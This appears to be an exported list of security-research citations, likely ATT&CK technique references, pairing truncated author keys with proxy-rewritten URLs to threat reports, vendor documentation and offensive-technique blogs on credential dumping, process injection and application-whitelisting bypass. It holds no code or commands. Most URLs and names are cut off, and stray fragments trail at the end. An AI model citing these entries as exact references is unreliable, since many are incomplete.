2 - appv Microsoft. https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started
5 - appv Nick Landerhttps://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/
7 - appv Nick Landerhttps://x.com/monoxgas/status/895045566090010624
3 - appv Raj Chandehttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/
1 - appv SEONGSU PA https://securelist.com/bluenoroff-methods-bypass-motw/108383/
6 - appv Strontic. ( https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19
Bienstock, Bienstock, https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defe
CrowdstrikeCrowdstrikehttps://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigat
Google EnsuGoogle. (20https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html
Gmail DeleGoogle. (n.https://support.google.com/a/answer/7223765?hl=en
FireEye APMandiant. https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
Mandiant Mandiant. https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?vie
Cloud HackHackTricks https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-a
OWN-CERTL'Hutereau
G https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
Cado SecurMatt Muir.https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda
Rhingo SecuSpencer Giehttps://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
welivesecuMarc-Etienn https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spywa
TCC Datab Marina Lianhttps://interpressecurity.com/resources/return-of-the-macos-tcc/
TCC macOSPhil Stokeshttps://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-desig
PTRACE maKerrisk, M.http://man7.org/linux/man-pages/man2/ptrace.2.html
Medium PtrJain, S. (2 https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be
BH Linux InColgan, T. https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf
Sleep, shu AVG. (n.d.)https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop
CoinLoaderAvira. (20 https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign
BATLOADER Bethany Hahttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html
Two New Mo Douglas Bohttps://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-
Condi-BotnJoie Salvio https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
systemdsleMan7. (n.d.https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html
Microsoft: Microsoft. https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-
Huntress ABrennan, Mhttps://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-she
BlackHat AChoi, S. (2 https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-A
Drakonia Hdrakonia. (https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03
IRED API Hspotheplanhttps://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware
Alperovitc Alperovitchhttp://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/
TechNet LoMicrosoft. https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx
Hexacorn LHexacorn. http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
Hexacorn LiHexacorn. (https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
Microsoft LMicrosoft. https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
Modexp Win odzhan. (2 https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
SocGholishAndrew Nort https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-updat
TA571 Axel F, Sel https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader
mod_rewriBluescreenhttps://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/
Browser-upDusty Millehttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape
StarBlizzar Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-
QR-cofens Nathaniel https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/
Schema-abNick Simonhttps://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
Orange ResiOrange Cybe https://www.orangecyberdefense.com/global/blog/research/residential-proxies
Facad1ng Spyboy. (2 https://github.com/spyboy-productions/Facad1ng
sysdig Sysdig. (20 https://sysdig.com/content/c/pf-2023-global-cloud-threat-report?x=u_WFRi&xs=524303#page=1
Microsoft Microsoft https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-pro
Microsoft MSRC. (202https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
Reaqta MSX Admin. (20https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
Twitter Sq Desimone, https://x.com/dez_/status/986614411711442944
J
LOLBAS Wm LOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Wmic/
Microsoft Microsoft. https://www.microsoft.com/download/details.aspx?id=21714
PenetrationetbiosX. ( https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
XSL BypassSingh, A. https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d
Microsoft Wenzel, M.https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
AWS CloudAmazon. (2https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
GCP - CreatGoogle. (20https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
Azure - MoMicrosoft. https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
Palo Alto OFalcone, R.https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persist
Hexacorn OHexacorn. (http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/
Talos PromMercer, W.https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
BitdefendeTudorica, Rhttps://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-A
Metcalf 20Metcalf, S. http://adsecurity.org/?p=1275
Wikipedia AWikipedia. https://en.wikipedia.org/wiki/Active_Directory
SANS InforMichael St https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
AWS LogginAWS. (n.d.)https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html
Microsoft ICai, S., Fl https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
Google CloGoogle Clou https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials
GCP Monito Google Clou https://cloud.google.com/iam/docs/service-account-monitoring
okta okta. (n.d. https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
Rhino SecuSpencer Gihttps://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration
StaaldraadStalmans, Ehttps://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
Microsoft Microsoft. https://technet.microsoft.com/library/dn408187.aspx
Microsoft DMicrosoft. https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx
Microsoft Microsoft. https://technet.microsoft.com/library/cc961760.aspx
Microsoft Microsoft. https://docs.microsoft.com/windows/win32/services/service-control-manager
RussinovichRussinovic https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
AWS IdentiAmazon. (n.https://aws.amazon.com/identity/federation/
Google FedGoogle. (n.https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azur
ProofpointKafeine. ( https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-
Kaspersky Kaspersky Lhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-la
Ebowla: GeMorrow, T.,https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
EK Clueles Riordan, J. https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
EK ImpedinSong, C., https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
Demiguise Warren, R.https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
Environmen Warren, R.https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files
SpectorOpsAtkinson, Jhttps://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea
Journey in Harrell, C. http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html
Microsoft NHughes, J. https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/
Microsoft Marlin, J. https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
Microsoft FMicrosoft. https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
Oddvar MoMoe, O. (20https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Oddvar MoMoe, O. (20https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Symantec Pravs. (20 https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-wind
Empire InvEmpireProjhttps://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerber
Microsoft Microsoft. https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-sy
Microsoft Microsoft. https://msdn.microsoft.com/library/ms677949.aspx
Harmj0y KeSchroeder,https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
GitHub Mim Deply, B., https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
ADSecurityMetcalf, S. https://adsecurity.org/?p=1729
Harmj0y MiSchroeder,https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
Wine API saWine API. (https://source.winehq.org/WineAPI/samlib.html
systemsetuApple Supphttps://support.apple.com/en-gb/guide/remote-desktop/apd95406b8d/mac
linux syst ArchLinux. https://wiki.archlinux.org/title/System_time
MAGNET GCheck Poinhttps://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulne
show_clockCisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896
Mac Time Cone, Matt.https://www.macinstruct.com/tutorials/synchronize-your-macs-clock-with-a-time-server/
ESET Dazzl M.Léveillé,https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-as
AnyRun Ti Malicious https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/
Technet WiMathers, Bhttps://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/w
MSDN SystMicrosoft. https://msdn.microsoft.com/ms724961.aspx
RSA EU12 TRivner, U. https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf
System Inf YUCEEL, Huhttps://www.picussecurity.com/resource/the-system-information-discovery-technique-explained-mitre-
Virtualiza YUCEEL, Hus https://www.picussecurity.com/resource/virtualization/sandbox-evasion-how-attackers-avoid-malware-
rowland li Craig Rowlahttps://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/
GTFObins aEmilio Pinnhttps://gtfobins.github.io/gtfobins/at/
Linux at IEEE/The Ohttps://man7.org/linux/man-pages/man1/at.1p.html
Malicious Philip Tsu https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
Hiding MalAliz Hammo https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/
Elastic Hu Desimone, https://www.endgame.com/blog/technical-blog/hunting-memory
Module StoRed Teaming https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowi
Exploit Da Offensive Shttps://www.exploit-db.com/
TempertonTemperton,https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage
Wired SandZetter, K. https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularl
Xorrior AutChris Ross.https://xorrior.com/persistent-credential-theft/
Ignacio UdEder P. Ign https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
Elastic Lin Ruben Groehttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
Reichert a Zachary Reihttps://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
EyeofRa DeEye of Ra. https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
Zairon HooFelici, M. https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
GMER RootGMER. (n.dhttp://www.gmer.net/
MWRInfoSeHillman, Mhttps://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
HighTech BMariani, B https://www.exploit-db.com/docs/17802.pdf
Microsoft Microsoft. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:W
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
PreKageo W Prekas, G. https://github.com/prekageo/winhook
Jay GetHooSatiro, J. https://github.com/jay/gethooks
StackExchaStack Exchahttps://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-
Adlice Sof Tigzy. (201 https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
Volatility Volatility https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
cisa_malwaCISA. (2022https://www.cisa.gov/uscert/ncas/alerts/aa22-057a
dhs_threatU.S. Depar https://cyber.dhs.gov/assets/report/ar-16-20173.pdf
Symantec Yamamura,https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/20
M
Dark Readi Brian Prin https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack
Diskshado Microsoft https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
Crytox Ra Romain Dum https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware
Rhino SecuSpencer Gihttps://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/
ZDNet RanSteve Ranghttps://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong
disable_noTheDFIRRepo https://x.com/TheDFIRReport/status/1498657590259109894
Demaske Ne Demaske, M https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshel
TechNet NeMicrosoft. https://technet.microsoft.com/library/bb490939.aspx
Github NetSmeets, M.https://github.com/outflankbv/NetshHelperBeacon
Lookout DaBlaich, A., https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
FireEye S FireEye. ( https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-c
Krebs DNS Brian Krebshttps://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/
Palo Alto Janos Szur https://unit42.paloaltonetworks.com/domain-shadowing/
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
Microsoft Microsoft. https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-in
Microsoft Microsoft. https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-tran
Kaspersky Plakhov, A.https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
NetSPI Sta Sutherland,https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1
NetSPI SQLSutherland,https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
Sentinel La Jim Walterhttps://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-ag
SC MagazinJoe Uchill. https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-networ
Guardian GKeza MacDo https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-w
copy_cmd_Cisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_com
MalwareUni Amanda Rou https://malwareunicorn.org/workshops/macos_dylib_injection.html#5
Apple DeveApple Inc.. https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibra
Wardle DylPatrick Warhttps://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf
Wardle DylPatrick Warhttps://objective-see.com/blog/blog_0x46.html
wardle art Patrick Wahttps://taomm.org/vol1/pdfs.html
Github EmpWardle, P.,https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/hos
Github EmpWardle, P.,https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/mo
Salesforce Bill Toulas https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-
Bypassing CNick Frichehttps://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/
GhostToken Sergiu Gatlhttps://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google
Exploit M Graeber, Mhttp://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
LOLBAS TraLOLBAS. (n.https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/
engima0x3Nelson, M.https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
engima0x3Nelson, M.https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Talos Nyet Chiu, A. ( https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
alert_TA1 CISA. (2018https://www.cisa.gov/uscert/ncas/alerts/TA18-106A
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
abusing_c bohops. (2 https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evas
mmc_vulnsBoxiner, A https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/
win_msc_fiBrinkmann,https://www.ghacks.net/2017/06/10/windows-msc-files-overview/
win_mmc Microsoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc
win_wbadm Microsoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delet
win_clsid_ Microsoft. https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm
what_is_mMicrosoft. https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/wh
phobos_virPhobos Ranhttps://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
Xpn Argue Chester, A.https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
Cobalt Str Mudge, R. https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
FireEye Fi McLellan, https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-
Microsoft PMicrosoft. https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
RedCanaryLambert, T.https://redcanary.com/blog/blue-mockingbird-cryptominer/
Red Canar Brown, J. https://redcanary.com/blog/cor_profiler-for-persistence/
Almond COAlmond. (20 https://offsec.almond.consulting/UAC-bypass-dotnet.html
GitHub Ome Yair, O. (2 https://github.com/OmerYa/Invisi-Shell
subTee .NESmith, C. ( https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-proc
s-threat-actors-malware/
secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

u/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

REPORT_vol.88_ENG.pdf
modular-malware-framework-south-asia/
